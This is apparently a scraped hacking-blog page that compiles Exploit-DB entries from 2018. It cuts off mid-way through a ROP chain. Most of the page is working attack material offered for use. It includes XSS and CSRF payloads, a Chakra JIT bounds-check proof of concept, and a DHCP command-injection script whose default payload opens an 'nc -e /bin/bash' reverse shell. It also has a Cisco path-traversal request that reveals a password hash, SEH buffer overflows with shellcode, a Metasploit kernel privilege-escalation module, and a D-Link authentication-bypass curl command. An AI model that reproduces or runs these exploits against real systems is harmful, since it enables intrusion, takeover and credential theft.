For Xbox-SystemOS version: 10.0.14393.2152 (rs1_xbox_rel_1610 161208-1218) fre, 12/14/2016
Other versions will most likely need modifications to the script.
**Credits**:
- https://github.com/theori-io/chakra-2016-11
- https://bugs.chromium.org/p/project-zero/issues/detail?id=952
- https://bugs.chromium.org/p/project-zero/issues/detail?id=945
**Info**:
It is not sufficient to start an .exe via shellcode ;)
Exploiters, be creative!
It is desired to find a way to invoke edge engine when console is offline
Greets from unknownv2 & mon0 _
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44644.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863569198
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-17
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499
# Version: 3.0
# Tested on: windows
# POC 1 : Cross site scripting :
1) Create an account and go to your profile.
2) When we want to put "<script></script>" in the fields,"script" will be
replaced with null.
so we can bypass this filter by using javascript's events like
"onmouseover" or "oninput" .
Put one of these payloads into the fields :
1 - " oninput=alert('xss') "
2 - " onmouseover=alert('xss') "
3) You will get an alert box inside the page . ( after put something into
the fields or move mouse on the fields)
# POC 2 : Cross-Site request forgery :
# With csrf vulnerability,attacker can easily change user's authentication.
# So in this script , we have anti-CSRF token .We can't change user's
# information without token.
# but there is a vulnerable parameter which has reflected xss in another page
# of this script.
# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here]
# Now we can bypass anti-csrf by this parameter and using javascript:
# Exploit :
"/><form action="
http://store.webandcrafts.com/demo/healwire/user/update-details-user/1"
method="POST">
<input type="hidden" name="first_name" value="a" />
<input type="hidden" name="address"
value="" oninput=alert(document.domain) ""
/>
<input type="hidden" name="pincode" value="a" />
<input type="hidden" name="phone" value="100000000" />
<input type="hidden" name="last_name" value="anything" />
<input type="hidden" name="_token" value="" />
</form>
<script>
var token = ' ';
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var secPage = this.responseXML;
token = secPage.forms[0].elements[0].value;
console.log(token);
}
}
req.open("GET","/demo/healwire/account-page",true);
req.responseType = "document";
req.send();
window.setTimeout(function(){
document.forms[0].elements[5].value = token;
document.forms[0].submit();
},3000)
</script>
# You can also send 2 ajax requests instead of using form .
# Encode this payload and put this into "msg" parameter
# JSON result after 3 seconds :
status "SUCCESS"
msg "User profile updated !"
/*
Chakra uses the InvariantBlockBackwardIterator class to backpropagate the information about the hoisted bound checks. But the class follows the linked list instaed of the control flow. This may lead to incorrectly remove the bound checks.
In the following code, currentBlock's block number is 4 and hoistBlock's block number is 1 (please see the IR code). I assume it should visit 4 -> 3 (skipped) -> 1 (break) in order with following the control flow, but it actually visits 4 -> 3 (skipped) -> 2 -> 1 (break) in order. This makes the block 2 have the wrong information about the bounds which affects the bound checks in the block 5 to be removed.
https://github.com/Microsoft/ChakraCore/blob/48c73e51c3e0fb36a08fa844cdb88c9d8a54de32/lib/Backend/GlobOpt.cpp#L14667
if(hoistBlock != currentBlock)
{
for(InvariantBlockBackwardIterator it(this, currentBlock->next, hoistBlock, nullptr);
it.IsValid();
it.MoveNext())
{
BasicBlock *const block = it.Block();
...
PoC:
*/
function opt(arr, idx) {
((arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234);
}
function main() {
let arr = new Uint32Array(1);
for (let i = 0; i < 10000; i++) {
opt(arr);
}
}
main();
/*
Here's the IR code for the PoC:
FunctionEntry #
---------
BLOCK 0: Out(1, 2)
$L8: #
s1[Object].var = Ld_A 0xXXXXXXXX (GlobalObject)[Object].var #
s21(s2)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 2147483632 (0x7FFFFFF0)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s3[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #
s22(s4)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 2147483633 (0x7FFFFFF1)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s23(s5)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 286331153 (0x11111111)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s24(s6)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s7[LikelyCanBeTaggedValue_Uint32Array].var = ArgIn_A prm2<40>[LikelyCanBeTaggedValue_Uint32Array].var! #
s8[LikelyUndefined_CanBeTaggedValue].var = ArgIn_A prm3<48>[LikelyUndefined_CanBeTaggedValue].var! #
Line 2: arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234);
Col 7: ^
StatementBoundary #0 #0000
BailOnNotArray s7[LikelyCanBeTaggedValue_Uint32Array].var #0000 Bailout: #0000 (BailOutOnNotArray)
s25.u32 = LdIndir [s7[Uint32Array].var+32].u32 #0000
NoImplicitCallUses s25.u32 #0000
ByteCodeUses s7 #0000
s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s25.u32 #0000
s15[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004
s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004
ByteCodeUses s10 #0004
BrNeq_I4 $L4, s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32!, 2147483632 (0x7FFFFFF0).i32 #0004
---------
BLOCK 1: In(0) Out(2, 3)
$L7: #0008
s15[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0008
s9[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0008
BoundCheck 2147483633 < s25.u32 #000f Bailout: #000f (BailOutOnFailedHoistedBoundCheck)
s27.u64 = LdIndir [s7[Uint32Array].var+56].u64 #000f
NoImplicitCallUses s25.u32 #000f
s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A [s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483632].var #000f Bailout: #000f (BailOutConventionalTypedArrayAccessOnly)
ByteCodeUses s16 #0015
s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0015
s9[CanBeTaggedValue_Int].var = ToVar s29(s9)[CanBeTaggedValue_Int].i32 #0018
ByteCodeUses s16 #0018
BrTrue_I4 $L3, s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0018
---------
BLOCK 2: In(0, 1) Out(5)
$L4: #001c
s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #001c
Br $L2 #001e
---------
BLOCK 3: In(1) Out(4) DeadOut(5)
$L3: #0021
NoImplicitCallUses s25.u32 #0021
ByteCodeUses s7 #0021
s30(s17)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s25.u32 #0021
s18[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025
s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025
ByteCodeUses s17 #0025
---------
BLOCK 4: In(3) Out(8, 5)
$L6: #0029
s18[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0029
s9[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0029
NoImplicitCallUses s25.u32 #0030
s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A [s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483633].var #0030 Bailout: #0030 (BailOutConventionalTypedArrayAccessOnly)
ByteCodeUses s19 #0036
s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0036
s9[CanBeTaggedValue_Int].var = ToVar s29(s9)[CanBeTaggedValue_Int].i32 #0039
ByteCodeUses s19 #0039
BrTrue_I4 $L9, s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0039
---------
BLOCK 5: In(2, 4) Out(6) DeadIn(3)
$L2: #003d
s32.u64 = LdIndir [s7[Uint32Array].var+56].u64 #003d
NoImplicitCallUses s25.u32 #003d
[s7[Uint32Array][seg: s32][segLen: s25][><].var+286331153].var = StElemI_A 4660 (0x1234).i32 #003d Bailout: #003d (BailOutConventionalTypedArrayAccessOnly)
s33(s20)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0043
ByteCodeUses s20 #0046
s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0046
s34.u64 = Ld_A s32.u64 #004b
Br $L1 #004b
---------
BLOCK 8: **** Air lock Block **** In(4) Out(6)
$L9: #004b
s34.u64 = Ld_A s27.u64 #004b
Br $L1 #004b
---------
BLOCK 6: In(8, 5) Out(7)
$L1: #004b
s0[Undefined].var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #004b
Line 3: }
Col 1: ^
StatementBoundary #1 #004d
StatementBoundary #-1 #004d
Ret s0[Undefined].var! #004d
---------
BLOCK 7: In(6)
$L5: #
----------------------------------------------------------------------------------------
*/
# Exploit Title: DynoRoot DHCP - Client Command Injection
# Date: 2018-05-18
# Exploit Author: Kevin Kirsche
# Exploit Repository: https://github.com/kkirsche/CVE-2018-1111
# Exploit Discoverer: Felix Wilhelm
# Vendor Homepage: https://www.redhat.com/
# Version: RHEL 6.x / 7.x and CentOS 6.x/7.x
# Tested on: CentOS Linux release 7.4.1708 (Core) / NetworkManager 1.8.0-11.el7_4
# CVE : CVE-2018-1111
#!/usr/bin/env python
from argparse import ArgumentParser
from scapy.all import BOOTP_am, DHCP
from scapy.base_classes import Net
class DynoRoot(BOOTP_am):
function_name = "dhcpd"
def make_reply(self, req):
resp = BOOTP_am.make_reply(self, req)
if DHCP in req:
dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1]))
for op in req[DHCP].options
if isinstance(op, tuple) and op[0] == "message-type"]
dhcp_options += [("server_id", self.gw),
("domain", self.domain),
("router", self.gw),
("name_server", self.gw),
("broadcast_address", self.broadcast),
("subnet_mask", self.netmask),
("renewal_time", self.renewal_time),
("lease_time", self.lease_time),
(252, "x'&{payload} #".format(payload=self.payload)),
"end"
]
resp /= DHCP(options=dhcp_options)
return resp
if __name__ == '__main__':
parser = ArgumentParser(description='CVE-2018-1111 DynoRoot exploit')
parser.add_argument('-i', '--interface', default='eth0', type=str,
dest='interface',
help='The interface to listen for DHCP requests on (default: eth0)')
parser.add_argument('-s', '--subnet', default='192.168.41.0/24', type=str,
dest='subnet', help='The network to assign via DHCP (default: 192.168.41.0/24)')
parser.add_argument('-g', '--gateway', default='192.168.41.254', type=str,
dest='gateway', help='The network gateway to respond with (default: 192.168.41.254)')
parser.add_argument('-d', '--domain', default='victim.net', type=str,
dest='domain', help='Domain to assign (default: victim.net)')
parser.add_argument('-p', '--payload', default='nc -e /bin/bash 192.168.41.2 1337', type=str,
dest='payload', help='The payload / command to inject (default: nc -e /bin/bash 192.168.41.2 1337)')
args = parser.parse_args()
server = DynoRoot(iface=args.interface, domain=args.domain,
pool=Net(args.subnet),
network=args.subnet,
gw=args.gateway,
renewal_time=600, lease_time=3600)
server.payload = args.payload
server()
# Exploit Title: Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery
# Date: 2018-05-18
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/classifieds-multipurpose-portal-infinity-market/16572285?s_rank=1520
# Version: 1.6.2
# Tested on: Kali linux
# Description : CSRF vulnerability allows attacker to change user's information directly .
# POC :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://geniuscript.com/classified/index.php/frontend/myprofile/en" method="POST">
<input type="hidden" name="name_surname" value="decode" />
<input type="hidden" name="username" value="user" />
<input type="hidden" name="password" value="anything" />
<input type="hidden" name="password_confirm" value="anything" />
<input type="hidden" name="address" value="Cyro trento 23" />
<input type="hidden" name="description" value="My description 2" />
<input type="hidden" name="phone" value="+10000000" />
<input type="hidden" name="mail" value="sanljiljan@geniuscript.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Title: Cisco SA520W Security Appliance - Path Traversal
# Author: Nassim Asrir
# Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: https://www.cisco.com/
# About Product:
===============
Cisco SA 500 Series Security Appliances are designed for businesses with fewer than 100 employees.
They combine firewall, VPN, and optional intrusion prevention system (IPS), email, and web security capabilities. Whether in the office or working remotely, your employees can securely access the resources they need, while your business is protected from unauthorized access and Internet threats.
# POC
====================
//In our poc we will try to read /etc/passwd
The vulnerable Parameter: thispage
payload: ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm
Request Type: POST
Request:
=======
POST /scgi-bin/platform.cgi HTTP/1.1
Host: host-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://70.186.255.169/scgi-bin/platform.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 311
Connection: close
Upgrade-Insecure-Requests: 1
thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm&SSLVPNUser.UserName=admin&SSLVPNUser.Password=admin&button.login.routerStatus=Log+In&Login.userAgent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0
Response:
========
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 00:00:41 GMT
Server: Embedded HTTP Server.
Connection: close
root:$1$omdZQoH8$bFOOjhl.E7BKKzvW/bRJe0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
#Timeline:
=========
18 Apr 2018 : First Contact with Cisco.
18 Apr 2018 : Cisco Ask me for more details about the vulnerability.
18 Apr 2018 : Details sent to Cisco
19 Apr 2018 : Ask for update
15 May 2018 : Cisco say "The product you reference went end of support in April 2016 No further action will be taken."
18 May 2018 : Public Disclosure
# Exploit Title: Prime95 Local Buffer Overflow (SEH)
# Date: 13-4-2018
# Exploit Author: crash_manucoot
# Contact: twitter.com/crash_manucoot
# Vendor Homepage: https://www.mersenne.org/
# Software Link: https://www.mersenne.org/download/#download
# Version: 29.4b8
# Tested on: Windows 10 Pro x64 SPANISH Windows 7 Home Premium x86 SPANISH Windows XP SP3 SPANISH
# Category: Windows Local Exploit
# How to use: open the program go to test-PrimeNet-check the square-Connections paste the contents of open.txt in the optional proxy hostname field and the calculator will open
buffer = "A" * 660
nseh = "\xeb\x06\x90\x90"
seh = "\x6B\xB0\xED\x6A" #pop esi # pop ebx # ret | {PAGE_EXECUTE_READ} [libgmp-10.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0
nop = "\x90" * 16
#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode
shellcode = ""
shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
shellcode += "\x8e\x2a\x79\xdb"
evil = buffer + nseh + seh + nop + shellcode
file = open('open.txt','w+')
file.write(evil)
file.close()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AF_PACKET packet_set_ring Privilege Escalation',
'Description' => %q{
This module exploits a heap-out-of-bounds write in the packet_set_ring
function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel
to execute code as root (CVE-2017-7308).
The bug was initially introduced in 2011 and patched in version 4.10.6,
potentially affecting a large number of kernels; however this exploit
targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,
including Linux distros based on Ubuntu Xenial, such as Linux Mint.
The target system must have unprivileged user namespaces enabled and
two or more CPU cores.
Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
may crash the kernel.
This module has been tested successfully on Linux Mint 18 (x86_64)
with kernel versions:
4.8.0-34-generic;
4.8.0-36-generic;
4.8.0-39-generic;
4.8.0-41-generic;
4.8.0-42-generic;
4.8.0-44-generic;
4.8.0-45-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrey Konovalov', # Discovery and C exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Mar 29 2017',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'EDB', '41994' ],
[ 'CVE', '2017-7308' ],
[ 'BID', '97234' ],
[ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ],
[ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ],
[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ],
[ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ],
[ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ]
],
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
write_file path, data
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless version =~ /^4\.8\.0-(34|36|39|41|42|44|45)-generic/
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} is vulnerable"
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
cores = get_cpu_info[:cores].to_i
min_required_cores = 2
unless cores >= min_required_cores
vprint_error "System has less than #{min_required_cores} CPU cores"
return CheckCode::Safe
end
vprint_good "System has #{cores} CPU cores"
unless userns_enabled?
vprint_error 'Unprivileged user namespaces are not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged user namespaces are permitted'
if kptr_restrict? && dmesg_restrict?
vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.'
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('poc.c')
rm_f "#{executable_path}.c"
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('exploit')
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit...'
output = cmd_exec "#{executable_path} #{payload_path}"
output.each_line { |line| vprint_status line.chomp }
print_status 'Deleting executable...'
rm_f executable_path
Rex.sleep 5
print_status 'Deleting payload...'
rm_f payload_path
end
end
# Exploit Title: Joomla! extension EkRishta 2.10 - Persistent Cross-Site Scripting / SQL Injection
# Dork: N/A
# Date: 2018-05-18
# Exploit Author: Sina Kheirkhah || (Sina.For.Sec@gmail.com)
# Software Link: https://extensions.joomla.org/extensions/extension/living/dating-a-relationships/ek-rishta/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 2.10
# Category: Webapps
# CVE: N/A
#
#
#
#POC-1) Cross site scripting (XSS) :
#
#
# Description:
#
# 1)create a profile
# 2)you can use your payload in profile info page
# 3)for example in Address field you can use
"></textarea><script>prompt('address')</script>
# 4)now the Payload will be executed whenever someone visits your profile
#
#
# POC-2) SQL Injection:
#
# Description:
# 1)the website has filtered all the inputs for sql injection BUT
# you can use the user_setting page in order to Inject SQL code
# by using POST method
# http://localhost/ekrishta/index.php/profile/user_setting
#
# <form method="POST" action="http://localhost/ekrishta/index.php/profile/user_setting">
# <input type="text" name="phone_no" value="SQL injection">
# <input type="hidden" name="task" value="save">
# <input type="submit" name="save" value="Save"/>
# </form>
# Exploit Title: D-Link DSL 3782 - Authentication Bypass
# Vendor Homepage: https://eu.dlink.com
# Version: A1_WI_20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"
# Category: Webapps
# Exploit Author: Giulio Comi
# CVE : CVE-2018-8898
# Date: 20/05/2018
# Description
# The web panel of D-Link DSL 3782 version (A1_WI_20170303) does not release a token ID (e.g. a session cookie) that identifies the logged in administrator, but only relies # on a server-side timeout that lasts few minutes.
# In addition, a server-side mitigation in place prompts for login credentials everytime the webroot is loaded, but does leave the application endpoints unprotected # and affected by this authentication bypass.
# Therefore, after a valid login of the administrator the web panel does not distinguish valid HTTP requests from the admin and the ones that come from other users.
# This way, an attacker can script an automatic routine that perform unwanted actions such as arbitrary modifications to router and SSIDs passwords and configurations.
# Some of the possible actions for retrieving important information
# GET http://192.168.1.1/romfile.cfg ---> retrieve the complete settings of the router (all credentials included)
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp ---> retrieve the password for SSID of 2.4Ghz
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp ---> retrieve the password for SSID of 5.0Ghz
# GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp ---> retrieve the password for Guest network, if present
# For POST requests that makes changes to passwords, SSIDs name and configurations, a 'sessionKey' value is used by the web application to prevent Cross-site request forgery (CSRF) attacks.
# However, this value can be retrieved with this Authentication Bypass issue with the following GET request:
# 'GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp'
# For example, the below POST request allows to change the Web Interface Administrator's password:
curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp
# Some other possible actions for altering the configurations:
# POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp ---> change passwords of the SSIDs
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp ---> upgrade firmware
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp ---> reboot router
# POST /cgi-bin/New_GUI/Set/config_upgrade.asp ---> upload a new configuration file ('romfile.cfg')
# Note 1: Since the router misses a network segretation, a user that has access to the Guest network could also perform this attack.
# Note 2: Web panels exposed to the Internet allows anonymous attacker to leverage this vulnerability and possibly takeover the router.
# Note 3: Others forks of the firmware and software versions have not been tested.
# Timeline
# 26/03 Vendor contacted
# 28/03 Vendor replied
# 05/04 Vendor requested more information to track the vulnerable firmware version 'because the D-Link DSL 3782 have many forks'
# 05/04 I have sent the detailed information of firmware and software version retrievable from:
# - the web panel graphic ('A1_WI_20170303')
# - the romfile.cfg ('SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"')
# 20/04 requested an update, no response
# 03/05 requested an update, no response
# 07/05 requested an update, still no response from the security response team
# 20/05 full disclosure
#!/usr/bin/python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow #
# Date: 2018-05-19 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html #
# Software Download #2: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe #
# Version: 1.7.11 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Credit: Thanks to Marwan Shamel (https://www.exploit-db.com/exploits/44565/) for his work on the original SEH exploit #
# Steps : Open the APP > click on register > Username field > paste in contents from the .txt file that was generated by this script #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characers: \x00\x0a\x0d #
# SEH Offset: 1012 #
# Non-Participating Modules: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# root@kali:~/Desktop# nc -nv 10.0.1.14 4444 #
# (UNKNOWN) [10.0.1.14] 4444 (?) open #
# Microsoft Windows [Version 6.1.7601] #
# Copyright (c) 2009 Microsoft Corporation. All rights reserved. #
# #
# C:\Program Files (x86)\Easy MPEG to DVD Burner> #
#------------------------------------------------------------------------------------------------------------------------------------#
# My register setup when VirtualAlloc() is called (Defeat DEP) :
#--------------------------------------------
# EAX = Points to PUSHAD at time VirtualAlloc() is called (Stack Pivot jumps over it on return)
# ECX = flProtect (0x40)
# EDX = flAllocationType (0x1000)
# EBX = dwSize (0x01)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (stack pivot into a rop nop / jmp esp)
# ESI = ptr to VirtualAlloc()
# EDI = ROP NOP (RETN)
import struct
def create_rop_chain():
rop_gadgets = [
#***START VirtualAlloc() to ESI***
0x10027e6b, # POP EAX # RETN [SkinMagic.dll] **
0x1003b1d4, # ptr to &VirtualAlloc() [IAT SkinMagic.dll]
0x100369a1, # MOV EAX,DWORD PTR DS:[EAX] # RETN [SkinMagic.dll]
0x10032993, # POP EBX # RETN [SkinMagic.dll]
0xffffffff, #
0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll]
